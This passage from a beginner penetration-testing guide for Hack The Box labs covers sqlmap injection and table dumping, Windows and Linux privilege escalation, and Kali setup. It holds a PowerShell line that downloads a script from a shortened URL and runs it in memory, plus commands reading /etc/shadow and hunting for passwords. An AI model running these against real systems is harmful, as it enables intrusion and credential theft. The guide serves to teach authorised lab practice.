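    con.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, login TEXT, password_hash TEXT)")
    con.executemany(
        "INSERT INTO users VALUES (?, ?, ?)",
        [(1, "admin", "<hash redacted>"), (2, "alice", "<hash redacted>")],
    )
    return con

def lookup_login_vulnerable(con, user_id):
    """The injectable pattern: the request parameter is pasted into the SQL text."""
    sql = f"SELECT login FROM users WHERE id = {user_id}"   # the input becomes part of the statement
    return [row[0] for row in con.execute(sql)]

def lookup_login_safe(con, user_id):
    """The fixed pattern: the value is bound as a parameter and is never parsed as SQL."""
    return [row[0] for row in con.execute("SELECT login FROM users WHERE id = ?", (user_id,))]

def probe(lookup, con, user_id):
    """Run a lookup and report either ("rows", [...]) or ("error", exception name).

    A real application must not forward the error branch to the client: the raw
    database error is what tells a tester (or sqlmap) that the parameter is injectable.
    """
    try:
        return ("rows", lookup(con, user_id))
    except sqlite3.Error as exc:
        return ("error", type(exc).__name__)

if __name__ == "__main__":
    con = make_db()
    for value in ("1", "1'"):
        print(f"id={value!r}: vulnerable -> {probe(lookup_login_vulnerable, con, value)}, "
              f"safe -> {probe(lookup_login_safe, con, value)}")
```

Note that the safe version still accepts the text `"1"` for an integer column (SQLite applies numeric affinity to the bound value); in a real application you would validate the parameter as an integer before it reaches the query at all, which removes even the "no rows" ambiguity.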
sqlmap will then automatically start injecting where it deems fit. Here I am going to use an example site I have set up. As you can see, I have a PHP file that takes a parameter `id`. Now instead of typing just `1`, I have added a `'` at the end. What happens is that the SQL statement is manipulated by this `'` and we get an SQL error from the backend server. This indicates that an SQL injection may be possible.

![](.gitbook/assets/image%20%2829%29.png)

Let's capture the request with Burp and save it with the filename `request.txt`

![](.gitbook/assets/image%20%2851%29.png)

Let's fire up our terminal and start sqlmap to see if it detects the potential SQL injection.

`sqlmap -r request.txt`

If it finds a parameter to inject, you will most likely be told so, and SQLmap will reveal what kind of DBMS is present. Here we can see it very quickly found that the `id` parameter was injectable and that the DBMS is `MySQL`.

![](.gitbook/assets/image%20%2859%29.png)

Now we are going to continue down the hierarchy indicated above. So just cancel this with `Ctrl+C`. We now specify that the DBMS is MySQL and say that we want to extract the databases using the `--dbs` parameter. This could take some time, because it is trying a lot of payloads.

`sqlmap -r request.txt --dbms=mysql --dbs`

![](.gitbook/assets/image%20%2852%29.png)

You will occasionally get prompted for input. The capital N means it's the default option, so you can just press Enter to move on. The default selections in SQLmap are usually sensible.

Now look in the screenshot above. We see that sqlmap automatically used some more advanced payloads to retrieve the names of two databases. The `information_schema` db is a default db in MySQL, so let's focus on the one called `photoblog`. Let's specify that we want to extract the tables from it.

`sqlmap -r request.txt --dbms=mysql -D photoblog --tables`

![](.gitbook/assets/image%20%2828%29.png)

And we just keep digging ourselves down this rabbit hole. As you can see, we have three tables in the database and one of them is called users. Let's just **dump** all the content of that table with the `--dump` option.

`sqlmap -r request.txt --dbms=mysql -D photoblog -T users --dump`

![](.gitbook/assets/image%20%2813%29.png)

To be nice I have censored the hashed password of the admin, but as you can see we end up with a complete dump of all the columns and rows in the `users` table in the `photoblog` database that is hosted on a `mysql` DBMS. And we barely did anything but type some lines and press enter! Do you now realize the power of Sqlmap? Magic!

![](.gitbook/assets/image%20%2814%29.png)

--------------------------------------------------------------------------------
/part-4-privilege-escalation.md:
--------------------------------------------------------------------------------
---
description: How to escalate your privileges to gain administrative access on a system
---

# Part 4 - Privilege escalation

## What do you learn in this part?

* Privilege escalation
* Windows
* Linux

**Boxes that are suitable for this part**

* Nibbles - 10.10.10.75
* Bashed - 10.10.10.68

**Other boxes**

* Celestial 10.10.10.85
* Jerry 10.10.10.95

## **Privilege escalation**

> Everybody wants to be a hacker, but nobody wants to read no damn man page - Chris

### The goal

* Linux - Becoming root, id 0
* Windows - Becoming NT AUTHORITY\SYSTEM or Administrator

What does it mean? Very often on Hackthebox and in real pentests we end up getting access to a system as a regular user or service account.
This access always has a certain level of privilege on the system you are on. Most regular users are low privileged, which means they can't perform administrative tasks, e.g. disable the antivirus, install new software, or open ports. Our goal is to get the highest level of privilege possible. In Windows that is called administrative privilege and in Linux it's called root or superuser privilege.

## **Windows privilege escalation**

### Credential reuse

Sometimes a user that you have the credentials for is also the administrator on the system, but uses the same password for both accounts. So never forget to try passwords when you have the chance. Just don't overdo it so you trigger some lockout mechanism and get detected.

Try the obvious - maybe the user is SYSTEM or is already part of the Administrators group. As you can see from the output of the three commands below, the username is _hacker_ and he is part of the group _administrators_. In this case, a privilege escalation is not necessary because we are already in the administrators group!

* `whoami`
* `net localgroup administrators`
* `net user "%username%"`

![](.gitbook/assets/image%20%2832%29.png)

### Kernel exploits

Metasploit's exploit suggester can be used to find kernel exploits in Windows. That means exploits that allow for local privilege escalation from user and service accounts to administrator or SYSTEM. We don't cover it here as it was thoroughly covered in [Part 1 - How to hack](part-1-how-to-hack.md#4-privilege-escalation) [\#Privilege Escalation](part-1-how-to-hack.md#4-privilege-escalation)

Run `systeminfo` or `sysinfo` to get some information about the OS and the installed hotfixes. If no hotfixes are listed, few or no patches are installed, which means the system is probably exposed to known kernel vulnerabilities. Hence, privilege escalation using kernel exploits could be possible.

### PowerUp

PowerUp is an extremely useful script for quickly checking for obvious paths to privilege escalation on Windows. It is not an exploit itself, but it can reveal vulnerabilities such as an administrator password stored in the registry and similar. We shamelessly use [harmj0y's guide](https://www.harmj0y.net/blog/powershell/powerup-a-usage-guide/) as the reference point for the following guide. Some basic knowledge about how to import PowerShell modules and use them is required.

Import the PowerUp module with the following:

`PS C:\>` **`Import-Module PowerUp.ps1`**

If you want to invoke everything without touching disk, use something like this:

`C:\> powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://bit.ly/1mK64oH'); Invoke-AllChecks"`

### Finding stuff fast

`findstr /s /C:"stringtosearchfor.txt" "C:*"`

### Service account escalation \(potato\)

There are several known techniques to escalate from service accounts to SYSTEM. The details of this exploit are slightly out of scope for what's supposed to be an entry level guide to hacking, but we chose to include it because it has saved us numerous times and because @decoder does such a good job with it. [https://decoder.cloud/2017/12/23/the-lonely-potato/](https://decoder.cloud/2017/12/23/the-lonely-potato/)

## **Linux privilege escalation**

### Sudo

What is sudo?

`sudo` is a command you will probably see a lot in the Linux world. It allows regular users to perform certain tasks as the root user. This is useful for performing administrative tasks without switching to the root user all the time. It requires that the user has been added to the sudoers group. Of course we should abuse this. Try `sudo -l` to find the commands your current user can run with sudo.

### Linux permissions

In Linux, everything is a file.
All files have owners and access permissions, and we use that to our advantage.

`ls -l Desktop/`

`-rwxr-xr-x 2 chris meme.jpg 4096 Dec 1 11:45 .`

This permissions indication is grouped into three categories: owner, group and world, in that order. For each of those three a read, write and execute permission is set. Owner simply means the owner of the file, group means access to the file through being a member of the appropriate group, and world simply means any user on the system.

`| rwx | r-x | r-x |`

Changing permissions to writable for the owner:

`chmod u+w script.sh`

### Confidential information and users

`id`

`su`

`sudo -l`

`cat /etc/passwd`

`cat /etc/shadow`

`cat /etc/group`

`cat /etc/sudoers`

`ls -alh /var/mail/`

`ls -ahlR /root`

`ls -ahlR /home/`

### Cron jobs - scheduled jobs that run every min/hour/day

`ls -al /etc/cron*`

`cat /etc/crontab`

`crontab -l`

If root runs a backup every other minute, what can we do? If it is a file or directory, we can hijack it if we have write permissions.

### World writable files and folders

`find / -xdev -type d \( -perm -0002 -a ! -perm -1000 \) -print`

`find / -writable -type d 2>/dev/null`

#### Generally interesting directories

`ls -la /*`

`ls -la /var/log`

`ls -la /var/mail`

`ls -la /var/www/`

`ls -la /opt`

### Find interesting files and directories fast

`find / -name "*.txt" 2> >(grep -v 'Permission denied' >&2)`

`grep -R -i "password" 2> >(grep -v 'Permission denied' >&2)`

### SUID files / binaries

A file with the SUID bit set runs with the permissions of its owner, no matter who executes it.
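Reading mode strings by eye scales badly once you are reviewing a whole system, so here is the permission model from the Linux permissions section and the setuid bit from this section in code. It is an added example, not from this guide: it decodes the ten-character mode column of `ls -l`, including the `s` and `t` characters that mark the setuid, setgid and sticky bits, and reports the two things a reviewer hardening a box cares about most, setuid-root binaries and world-writable entries that a root cron job might run (sticky world-writable directories such as `/tmp` are deliberately excluded, matching the `! -perm -1000` in the `find` above). The listing it runs on is constructed; only the `meme.jpg` entry mirrors the page's example.

```python
def parse_mode(mode_str):
    """Decode the 10-character mode column of `ls -l`, e.g. "-rwsr-xr-x"."""
    if len(mode_str) != 10:
        raise ValueError(f"expected a 10-character mode string, got {mode_str!r}")
    perms = {}
    for who, chunk in zip(("owner", "group", "world"),
                          (mode_str[1:4], mode_str[4:7], mode_str[7:10])):
        perms[who] = {
            "read": chunk[0] == "r",
            "write": chunk[1] == "w",
            "execute": chunk[2] in "xst",   # lower-case s/t: special bit *and* execute
        }
    return {
        "type": {"-": "file", "d": "directory", "l": "symlink"}.get(mode_str[0], "other"),
        "perms": perms,
        "setuid": mode_str[3] in "sS",   # owner execute slot carries the setuid flag
        "setgid": mode_str[6] in "sS",   # group execute slot carries the setgid flag
        "sticky": mode_str[9] in "tT",   # world execute slot carries the sticky flag
    }

def audit_entry(mode_str, owner, path):
    """Findings a reviewer would raise for one entry; an empty list means nothing notable."""
    info = parse_mode(mode_str)
    findings = []
    if info["setuid"] and owner == "root" and info["type"] == "file":
        findings.append("setuid-root binary: runs as root for any caller, confirm it is needed")
    sticky_dir = info["type"] == "directory" and info["sticky"]   # /tmp-style, users only delete their own
    if info["perms"]["world"]["write"] and not sticky_dir:
        findings.append("world-writable: any local user can change what root may later run")
    return findings

def audit_listing(listing):
    """Parse `ls -l` text and map each path that has findings to its findings."""
    results = {}
    for line in listing.splitlines():
        parts = line.split(None, 8)        # mode links owner group size month day time name
        if len(parts) < 9 or len(parts[0]) != 10:
            continue                       # skips "total N" and anything that is not an entry
        mode, owner, name = parts[0], parts[2], parts[8]
        findings = audit_entry(mode, owner, name)
        if findings:
            results[name] = findings
    return results

# Constructed listing, not real output from any box in this guide.
SAMPLE_LISTING = """\
total 16
-rwsr-xr-x 1 root  root  59640 Mar 22  2019 /usr/bin/passwd
-rwxrwxrwx 1 root  root    214 Dec  1 11:45 /opt/backup.sh
drwxrwxrwt 9 root  root   4096 Dec  1 11:40 /tmp
-rwxr-xr-x 1 chris chris  4096 Dec  1 11:45 meme.jpg
"""

if __name__ == "__main__":
    for path, findings in audit_listing(SAMPLE_LISTING).items():
        for finding in findings:
            print(f"{path}: {finding}")
```

On a real box you would feed it the output of `find / -perm -u=s -type f -exec ls -l {} +` or of the world-writable `find` above; the point is that `/opt/backup.sh` being root-owned but world-writable is the cron scenario described a few lines up, and it is visible from the mode string alone.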
If root owns such a file, we can run it and hijack it to become root.

`find / -perm -u=s -type f 2>/dev/null`

### Look for Linux kernel exploits

First find what kernel and distro you are running. Then use searchsploit to identify whether there are any exploits available for privilege escalation.

`uname -a`

`cat /etc/*-release`

`cat /etc/issue`

`searchsploit kernel`

Here you can see how we can find local privilege escalation exploits from Exploit-DB. If you look in the path on the right hand pane you can see some of them have "local" in the path, which means they are local privilege escalation exploits, which are those we want. Those that have "dos" in the path are for denial of service attacks, which won't be relevant. Note that kernel exploits are prone to crashing the operating system, so be very careful with running these. Make attempts to exhaust other alternatives before turning to kernel exploits.

![](.gitbook/assets/image%20%2845%29.png)

### Check running services and installed applications

`ps -ef`

`cat /etc/services`

`dpkg -l`

`rpm -qa`

An example here is for instance that you see a local database like mysql is running. Maybe you are able to find credentials for it and log into it locally on the box.

--------------------------------------------------------------------------------
/preparation.md:
--------------------------------------------------------------------------------
---
description: >-
  The purpose of this chapter is to make sure you have a fully functional Kali
  Linux. It takes an estimated hour or two to get set up, depending on skill
  level with virtualization and with Linux.
---

# Preparation

## Goal

* Kali Linux running as a virtual machine \(VM\) in either Virtualbox, Hyper-V or VMware Workstation/Player
* VM must be able to enter fullscreen mode
* Working copypaste of files and text between Kali and the host operating system
* Working VPN access to HTB
* Acquire some basic Linux terminal skills

### **1 - Join the social channel**

There is an official [Hackthebox Discord](https://discord.gg/BpWsXza). There is also a dedicated Hackthebox channel in the [Netsecfocus MM](https://mm.netsecfocus.com/join). Both have a lot of hackers eager to assist if you ask nicely.

### **2 - Install virtualization software**

You need to run Kali Linux as a virtual machine on your computer. There are a few software alternatives for working with virtual machines \(VMs\). You can use whatever host operating system you like as long as you feel comfortable installing the required software. The "host" operating system is the one installed on your laptop. The "guest" is the virtual machine operating system.

* [Virtualbox](https://www.virtualbox.org/) - free
* [VMware Player](https://www.vmware.com/products/workstation-player.html) - free
* [VMware Workstation Pro](https://www.vmware.com/products/workstation-pro.html) - paid
* [VMWare Fusion](https://www.vmware.com/products/fusion.html) - paid, for MacOS
* [Hyper-V](https://docs.microsoft.com/en-us/virtualization/hyper-v-on-windows/quick-start/enable-hyper-v) - preinstalled in Windows 10, but must be enabled. Linux support is not great, so this guide won't cover it as it relies on Kali Linux.

### **3 - Install Kali Linux**

[Kali Linux](https://www.kali.org) is a Linux distribution maintained by Offensive Security. They provide pre-installed VMs you can import straight into your virtualization software and run instantly without having to install anything.
If you choose to install it manually you are free to do so.

* [Download a Kali VM](https://www.offensive-security.com/kali-linux-vm-vmware-virtualbox-hyperv-image-download/) appropriate for your virtualization software of choice, see step 2. You want a 64-bit version, not x86/32-bit
* [Kali Linux Vm 64 Bit Ova](https://images.offensive-security.com/virtual-images/kali-linux-2018.3-vm-amd64.ova) if you use VMware
  * File -> Open -> _Select the Kali ovf file you downloaded_ -> Open
* [Kali Linux Vbox 64 Bit Ova](https://images.offensive-security.com/virtual-images/kali-linux-2018.3-vbox-amd64.ova) if you use Virtualbox
  * File > Import Appliance > _Select the Kali ova file you downloaded_ > Import
* You do not need to create a new user in Kali Linux. The root user is sufficient for this guide and will make installation of software work without using the `sudo` command.

### **4 - Make copypaste and fullscreen work**

Without copypaste between guest and host OS and fullscreen, hacking is gonna become a bit tiresome. So we highly recommend you get this working before you start. You need what's called guest additions to be able to do these things. We recommend using the packages available through the package manager in Kali. The package depends on whether you use Virtualbox or VMware.

#### Virtualbox

Run the following command, make sure it installs and reboot the guest OS \(Kali\) afterwards.

`apt install -y virtualbox-guest-x11`

#### VMware

Run the following command, make sure it installs and then reboot the guest OS afterwards.

`apt install open-vm-tools open-vm-tools-desktop`

#### Hyper-V

You are on your own here. Hyper-V generally doesn't have support for direct copypaste between host and guest OS.

#### Troubleshooting

* Reboot guest OS
* Reboot host OS
* Reinstall the guest tools
* Worst case: reinstall Kali in a new virtual machine

### 5 - Register to Hackthebox \(HTB\)

HTB has a challenge to get an invite code where you have to "hack" it. We won't spoil it, so you are on your own here. If you struggle, ask in the social channel for hints. They change this challenge from time to time to prevent people from spoiling the solution, so solutions from Google and YouTube may not help you here. Click the link below to start hacking your way into HTB!

[Join Hackthebox](https://www.hackthebox.eu/invite)

Once you've gotten past the challenge, you can register and start navigating around the Hackthebox website. HTB will be explained in further detail later in this guide, so don't start worrying if you feel a bit lost.

### 6 - Connect to HTB using VPN

We are now going to use VPN to connect to the HTB lab. With VPN it will be just as if your Kali Linux box is connected to the same network as the lab. That way we can interact directly with the machines in the lab. We are going to need the software called `openvpn` and a personal VPN config file we download from HTB.

#### Do the following from Kali Linux

* Install openvpn with `apt install openvpn`
* Click the _Access_ menu in the left side menu on HTB

![](.gitbook/assets/screenshot-2018-09-12-at-09.27.02%20%281%29.png)

* Click _Connection Pack_. This downloads a VPN config file to your downloads folder, which should be named something like `your_htb_username.ovpn`

![](.gitbook/assets/screenshot-2018-09-12-at-09.28.21.png)

* Connect to HTB with `openvpn`: `openvpn /root/Downloads/username.ovpn`

![](.gitbook/assets/image%20%2861%29.png)

* Leave the terminal window open, as this is what keeps the VPN connection alive.
If you close it, your VPN connection will be shut down and you will lose access to the lab until you reconnect.
* To verify, open a new terminal and type `ip addr`. You should see a `tun0` or `tap0` interface with an IP address in the 10.10.X.X/23 range. See number 3 in the screenshot below. If you don't have such an interface, something is not right.

![](.gitbook/assets/image%20%284%29.png)

* Verify in the Access panel that the IP address is the same as in the "inet" of the tun0 interface.
* Try to scan a box using `nmap ` on one of the IP addresses under "Active" machines.
* Poke around the HTB web interface to learn how the platform works.

### **7 - Verify that things work**

Check that the following works:

* Kali Linux is running as a VM
* The VM survives a reboot
* Kali can be put in fullscreen
* Copypaste between Kali and the host OS works
* VPN to HTB is connected and working

**Troubleshooting**

* Reboot
* In the Access panel on HTB, press Regenerate to reset the VPN connection and download a new VPN pack.
* Try reconnecting with `openvpn` as in step 6 of this article.

### 8 - Practice the Linux terminal

The site [Linux Journey](https://linuxjourney.com/) provides a fine introduction to Linux. We recommend doing the following modules, but if you decide to do more that is of course fantastic.

* [Getting Started](https://linuxjourney.com/lesson/linux-history)
* [Command Line](https://linuxjourney.com/lesson/the-shell)
* [Text-fu](https://linuxjourney.com/lesson/stdout-standard-out-redirect) \(optional, but incredibly useful\)

Unless you are already a Linux sysadmin and these things are absolutely clear to you, I recommend doing at least the Command Line module. It allows you to become familiar with basic navigation in the terminal.
Test all the commands in the terminal in Kali Linux. **Being able to use Linux and the terminal efficiently is the alpha and omega of hacking.**

--------------------------------------------------------------------------------
/what-now.md:
--------------------------------------------------------------------------------
---
description: Outlining what could be the next steps in your hacker career
---

# What now?

* Keep working on boxes on HTB
* Read writeups of machines and [Ippsec videos](https://www.youtube.com/channel/UCa6eh7gCkpPo5XXUDfygQQA) to learn how others solved boxes you have rooted
* Spread your knowledge by teaching others what you have learned and maybe even make some short writeups of boxes
* Read some books on hacking subjects that interest you
* **More advanced labs on HTB** - Endgame \(requires guru rank\), Rastalabs \(paid\), Offshore \(paid\)
* **Offensive Security Certified Professional \(OSCP\)** certification
  * 55 machines with 30/60/90 day lab access, 24 hour exam.
  * HTB is harder than OSCP
* **SANS Holiday Hack 2018**
  * Starts December 2018
  * 8-bit mini game
  * Super cool CTF challenges
  * Hacking boxes
  * Saving Santa Claus

Microsoft hacking is extremely fun and useful to get into, especially if you want to venture past hacking individual boxes. Check out chryzsh's other Gitbook called [Darth Sidious](https://hunter2.gitbook.io/darthsidious/), dedicated to Windows hacking.

![](https://lh3.googleusercontent.com/4D-jyn-zfGy01nL5pL5yEIq2pA-p0ZTdjvSBasc5KjNHQZFGufCut_k3hJxjbsdWP6UHbECKESnLexmN_RkpXQh7FkPyT1xhHP4EgWTd6K1GZsvozQHpuUtaiUKaXdLM4sxbXk41Ddc)

--------------------------------------------------------------------------------